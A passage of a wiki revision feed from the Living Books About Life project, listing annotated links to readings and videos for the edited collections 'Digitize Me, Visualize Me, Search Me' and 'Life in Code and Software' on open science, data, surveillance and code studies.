;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4721</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4721"/>
		<updated>2012-05-06T10:30:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYOurself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software&amp;diff=4716</id>
		<title>Life in Code and Software</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software&amp;diff=4716"/>
		<updated>2012-04-18T17:31:46Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LivingCodeSoftwareCover.jpg|right|318x450px|LivingCodeSoftwareCover.jpg]] Mediated life in a complex computational ecology &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; [http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-XXX-X] &amp;lt;br&amp;gt; ''edited by'' [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/bio David Berry] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/Introduction '''Introduction: What is code and software?''']  ==&lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living and code and software. It does so because these technologies increasingly make up an important part of our urban environment, and indeed stretching even to very remote areas of the world. The book introduces and explores the way in which code and software become the conditions of possibility for human living, crucially becoming a computational ecology which we inhabit. As such we need to take account of this new computational world and think about how we live today in a highly mediated code-based world. Computer code and software are not merely mechanisms, they represent an extremely rich form of media. They differ from previous instantiations of media forms in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remain within the purview of humans to seek to understand. [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Thinking Software  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Eric W. Weisstein&amp;amp;nbsp;&lt;br /&gt;
:[http://mathworld.wolfram.com/TuringMachine.html What is a Turing Machine?]&lt;br /&gt;
&lt;br /&gt;
;David Barker-Plummer&amp;amp;nbsp;&lt;br /&gt;
:[http://plato.stanford.edu/entries/turing-machine/ Turing Machines]&lt;br /&gt;
&lt;br /&gt;
;Achim Jung&amp;amp;nbsp;&lt;br /&gt;
:[http://www.cs.bham.ac.uk/~axj/pub/papers/lambda-calculus.pdf A short introduction to the Lambda Calculus]&lt;br /&gt;
&lt;br /&gt;
;Luciana Parisi &amp;amp;amp; Stamatia Portanova&amp;amp;nbsp;&lt;br /&gt;
:[http://computationalculture.net/article/soft-thought Soft Thought (in architecture and choreography)]&lt;br /&gt;
&lt;br /&gt;
;David M. Berry&amp;amp;nbsp;&lt;br /&gt;
:[http://www.palgrave.com/PDFs/9780230292642.pdf Understanding Digital Humanities]&lt;br /&gt;
&lt;br /&gt;
;Edsger W. Dijkstra&amp;amp;nbsp;&lt;br /&gt;
:[http://www.u.arizona.edu/~rubinson/copyright_violations/Go_To_Considered_Harmful.html Go To Statement Considered Harmful]&lt;br /&gt;
&lt;br /&gt;
;Alan M. Turing&amp;amp;nbsp;&lt;br /&gt;
:[http://classes.soe.ucsc.edu/cmps140/Winter10/turing1950.pdf Computing machinery and intelligence]&lt;br /&gt;
&lt;br /&gt;
;Martin Gardner : [http://www.ibiblio.org/lifepatterns/october1970.html The fantastic combinations of John Conway's new solitaire game 'life']&lt;br /&gt;
&lt;br /&gt;
;Alan M. Turing&amp;amp;nbsp;&lt;br /&gt;
:[http://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdfOn Computable Numbers, with an Application to the Entscheidungs problem]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;E3keLeMwfHY&amp;lt;/youtube&amp;gt; ''Video of a Turing Machine - Overview'' &lt;br /&gt;
&lt;br /&gt;
;Kevin Slavin&amp;amp;nbsp;&lt;br /&gt;
:[http://www.ted.com/talks/kevin_slavin_how_algorithms_shape_our_world.html How algorithms shape our world]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;TDaFwnOiKVE&amp;lt;/youtube&amp;gt; ''Video shows how these complex computer programs determine: espionage tactics, stock prices, movie scripts, and architecture.''&lt;br /&gt;
&lt;br /&gt;
== Code Literacy ('iteracy')  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;David M. Berry&amp;amp;nbsp;&lt;br /&gt;
:[http://stunlaw.blogspot.com/2011/09/iteracy-reading-writing-and-running.html Iteracy: Reading, Writing and Running Code]&lt;br /&gt;
&lt;br /&gt;
;Ian Bogost&amp;amp;nbsp;&lt;br /&gt;
:[http://www.bogost.com/downloads/I.%20Bogost%20Procedural%20Literacy.pdf Procedural Literacy: Problem Solving with Programming, Systems, &amp;amp;amp; Play]&lt;br /&gt;
&lt;br /&gt;
;Cathy Davidson&amp;amp;nbsp;&lt;br /&gt;
:[http://dmlcentral.net/blog/cathy-davidson/why-we-need-4th-r-reading-writing-arithmetic-algorithms Why We Need a 4th R: Reading, wRiting, aRithmetic, algoRithms]&lt;br /&gt;
&lt;br /&gt;
;Jeannette M. Wing&amp;amp;nbsp;&lt;br /&gt;
:[http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/Wing06.pdf Computational Thinking]&lt;br /&gt;
&lt;br /&gt;
;Stephan Ramsay&amp;amp;nbsp;&lt;br /&gt;
:[http://lenz.unl.edu/papers/2011/01/11/on-building.html On Building]&lt;br /&gt;
&lt;br /&gt;
;Edsger W. Dijkstra&amp;amp;nbsp;&lt;br /&gt;
:[http://virtual.itca.edu.sv/dokeos/sinapsis/cd/doctos-sw-libre/docus-ewd/EWD1036%20-%20On%20the%20cruelty%20of%20really%20teaching%20computing%20scienc.pdf On the cruelty of really teaching computing science]&lt;br /&gt;
&lt;br /&gt;
;Louis McCallum and Davy Smith&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/20241649 Show Us Your Screens]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=20241649}} &amp;lt;br&amp;gt;''A short documentary about live coding practise by Louis McCallum and Davy Smith.'' &lt;br /&gt;
&lt;br /&gt;
;Jeannette M. Wing&amp;amp;nbsp;&lt;br /&gt;
:[http://www.youtube.com/C2Pq4N-iE4I Computational Thinking and Thinking About Computing']&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;C2Pq4N-iE4I&amp;lt;/youtube&amp;gt; ''Wing argues that computational thinking will be a fundamental skill used by everyone in the world. To reading, writing, and arithmetic, she adds computational thinking to everyones' analytical ability.'' &lt;br /&gt;
&lt;br /&gt;
== Decoding Code  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;David M. Berry&amp;amp;nbsp;&lt;br /&gt;
:[http://thirteen.fibreculturejournal.org/fcj-086-a-contribution-towards-a-grammar-of-code/ A Contribution Towards a Grammar of Code]&lt;br /&gt;
&lt;br /&gt;
;Mark C. Marino&amp;amp;nbsp;&lt;br /&gt;
:[http://www.electronicbookreview.com/thread/electropoetics/codology Critical Code Studies]&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp;&lt;br /&gt;
:[http://lab.softwarestudies.com/2008/11/softbook.html Software Takes Command]&lt;br /&gt;
&lt;br /&gt;
;Dennis G. Jerz&amp;amp;nbsp;&lt;br /&gt;
:[http://www.digitalhumanities.org/dhq/vol/001/2/000009/000009.html Somewhere Nearby is Colossal Cave: Examining Will Crowther's Original &amp;quot;Adventure&amp;quot; in Code and in Kentucky]&lt;br /&gt;
&lt;br /&gt;
;Aleksandr Matrosov, Eugene Rodionov, David Harley, and Juraj Malcho, J.&amp;amp;nbsp;&lt;br /&gt;
:[http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf Stuxnet Under the Microscope]&lt;br /&gt;
&lt;br /&gt;
;Ralph Langner&amp;amp;nbsp;&lt;br /&gt;
:[http://www.youtube.com/watch?v=CS01Hmjv1pQ Cracking Stuxnet, a 21st-century cyber weapon]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;CS01Hmjv1pQ&amp;lt;/youtube&amp;gt; ''A fascinating look inside cyber-forensics and the processes of reading code to understand how it works and what it attacks.'' &lt;br /&gt;
&lt;br /&gt;
;Stephen Ramsay&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/9790850 Algorithms are Thoughts, Chainsaws are Tools]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=9790850}} &amp;lt;br&amp;gt; ''A short film on livecoding presented as part of the Critical Code Studies Working Group, March 2010, by Stephen Ramsay. Presents a &amp;quot;live reading&amp;quot; of a performance by composer Andrew Sorensen.'' &lt;br /&gt;
&lt;br /&gt;
;Wendy Chun&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/16328263 Critical Code Studies]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=16328263}} &amp;lt;br&amp;gt; ''Wendy Chun giving a lecture on code studies and reading source code.'' &lt;br /&gt;
&lt;br /&gt;
;Federica Frabetti&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/16263212 Critical Code Studies]&lt;br /&gt;
&lt;br /&gt;
